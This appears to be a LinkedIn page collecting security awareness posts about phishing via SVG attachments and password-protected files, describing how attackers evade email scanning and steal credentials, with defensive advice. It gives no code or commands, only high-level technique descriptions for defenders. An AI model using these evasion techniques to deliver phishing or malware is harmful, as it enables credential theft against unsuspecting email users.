Phishing emails are increasingly using SVG (Scalable Vector Graphics) attachments to avoid detection by security software. SVG files can display graphics, HTML, and execute JavaScript, making them useful for phishing attacks. These attachments are often used to present phishing forms or disguise as official documents, tricking users into downloading malware. MalwareHunterTeam has reported a rise in the use of SVG files in phishing campaigns. Due to their textual nature (XML), SVG files often bypass security detection tools. Since SVG attachments are rare in legitimate emails, they should be treated cautiously unless expected. This screenshot displays an altered SVG phishing sample (altered by NVISO) showing a "no-reply" Wikipedia email address. When a victim receives this SVG attachment, it includes their own email address. Upon opening, the SVG mimics a blurred Excel spreadsheet, with a green phishing form overlaid on top. The Wikipedia logo is fetched via a legitimate Clearbit logo service (through an HTTPS request to logo[.]clearbit[.]com, which can be detected). This entices the victim to enter their credentials to see the full spreadsheet. When the victim enters their password and clicks the "View Document" button, the credentials are sent to an attacker-controlled web server. #phishing #security #detection #awareness
Risky attachment detection in emails
Explore top LinkedIn content from expert professionals.
Summary
Risky-attachment-detection-in-emails refers to the process of identifying email attachments that could hide malware or phishing schemes, such as password-protected files or unusual formats like SVG graphics. These attachments often bypass traditional security measures and trick users into revealing sensitive information or downloading harmful software.
- Scrutinize attachments: Always review any unexpected attachment, especially if it’s a password-protected file or an unfamiliar format like SVG, and verify its legitimacy before opening.
- Enable specialized scanning: Make sure your email security tools are configured to scan password-protected files and analyze the content of less common attachments, such as SVGs.
- Educate your team: Regularly train colleagues to recognize warning signs of phishing attempts, including suspicious file types and emails that share passwords in the message body.
-
-
Here To Write About Cyber Attacks & Trends in Plain Language | Enterprise Security Operations @ Google
19,907 followers"How Attackers Are Using Password-Protected Files To Bypass Detection and How to Stop Them?" In war, using enemy's weapon against them is a powerful tactic! Cyber attackers apply this meticulously: Using the same defenses meant to protect us to their advantage. It's like turning our shields into their secret weapon. In today's post, "password protected file" is that weapon. Password-protected files are intended to share files securely with others. They can be documents, PDFs, ZIP files etc. They simply prompt for a password when opened. But attackers intelligently use it as an attack vector to bypass detection. Let's see how... 𝗔𝘁𝘁𝗮𝗰𝗸 𝗙𝗹𝗼𝘄: 1) Attacker creates & sends a password protected malware file as an email attachment. 2) Security tools can't analyze them as automated scanning fails (since file is password locked). 3) Victim opens the file that's disguised as legit doc (often as invoice). 4) Victim assumes that since its sensitive file it might have been password protected. Notices the password mentioned in the same email body. Enters it. 5) Victim now opens the files inside > Ransomware or malware gets executed on the device. Thus, attackers bypass the email/network gateway security and reach the device very cunningly. Instead of an attachment, a common trend these days is to use password protected Dropbox or Google Drive file link to achieve the same. 𝗛𝗼𝘄 𝗰𝗮𝗻 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗔𝗻𝗮𝗹𝘆𝘀𝘁𝘀 𝗰𝗼𝘂𝗻𝘁𝗲𝗿 𝘁𝗵𝗶𝘀? --> Depending on your company requirements, consider blocking or quarantining emails with password-protected attachments. (With the current enterprise secure sharing options available, users should not be relying on password protected files anyway). --> A few email security vendors do support scanning of password protected files if the password is present in the mail body. Turn on these features for SOC team's visibility. --> To tackle these attacks, evaluate what dynamic preventative security controls at web browser and end point level are present. i.e. what controls do you have if the file redirects the user to a malicious site or attempts to install malware? --> Educate the users about these scenarios. Tell them that password protected files are suspicious. Tell them that if the password is listed in the same email, it's even more suspicious. If you enjoyed this or learned something, follow me at Rohit Tamma for more in future! #ransomware #incidentresponse #cybersecurity #informationsecurity #cyberattack #threatdetection
-
🚨 Phishing Alert: Threat Actors are Getting Creative with SVG Attachments! 🚨 Cybercriminals are constantly innovating to bypass detection, and their latest trick? Using SVG (Scalable Vector Graphics) attachments in phishing emails. Here's why this matters: 🌐 Traditional Images (JPG/PNG): These are pixel-based grids, easy to scan for malicious content. 🖌️ SVG Files: Instead of pixels, they use lines, shapes, and text defined by mathematical formulas. This makes them lightweight, scalable, and harder for traditional email filters to analyze effectively. ⚠️ How They're Exploited: 1️⃣ Embedding phishing forms directly in SVG files. 2️⃣ Using SVGs to deliver malicious payloads while avoiding detection. 🔒 What Can You Do? ✅ Be cautious of unexpected email attachments, especially SVG files. ✅ Train employees on identifying phishing attempts. ✅ Deploy advanced email security solutions that analyze SVG file content. Phishing campaigns are evolving, and staying informed is your first line of defense! 💡 Have you encountered this technique? Share your thoughts and let's discuss how to combat it! #CyberSecurity #PhishingAwareness #SVGFiles #ThreatIntel #StaySafeOnline